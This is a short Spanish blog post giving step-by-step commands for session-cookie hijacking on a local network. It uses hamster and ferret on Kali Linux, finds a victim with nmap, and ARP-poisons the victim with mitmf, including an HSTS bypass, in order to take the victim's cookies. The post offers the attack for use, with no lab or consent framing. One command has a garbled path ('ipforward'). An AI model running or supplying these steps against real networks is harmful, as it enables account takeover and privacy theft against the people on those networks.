viernes, 29 de diciembre de 2017

Hamster and Ferret

Hola amigos.

Hoy, vamos a capturar cookies de manera local con dos amigos, hamster y ferret, que vienen ya por defecto en la distribución Kali. Usaremos, como ejemplo, Kali Linux moto, que, aunque ya está desfasada, yo la sigo utilizando algunas veces.

En primer lugar, en una consola, ponemos

ifconfig wlan0 up

Posteriormente, nos vamos al directorio /usr/bin/ y ejecutamos hamster

hamster



En otra consola, también en el directorio /usr/bin/

ferret -i wlan0



Abrimos el navegador y ponemos




No os preocupéis de que todavía no salga alguna víctima (target).

Nos vamos al enlace adapters



Ponemos la interfaz de red que vamos a usar, en mi caso wlan0, y le damos a Submit Query

La ventana de hamster nos ha empezado a cambiar



Si os pone [hamster] no such file or directory, es que no estáis ejecutando hamster y ferret en /usr/bin

Bien, buscamos una victima con

nmap -sn 192.168.0.0/24

Y hacemos un envenenamiento arp

echo 1 > /proc/sys/net/ipv4/ipforward

mitmf --hsts --spoof --arp -i wlan0 --gateway 192.168.0.1 --target 192.168.0.10
Donde 192.168.0.1 va a ser el router y 192.168.0.10 la víctima.

Y ya sólo es refrescar el navegador



Ya sólo es pulsar la víctima que queramos y tendremos sus cookies.

¡¡ Feliz 2.018 !!





No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.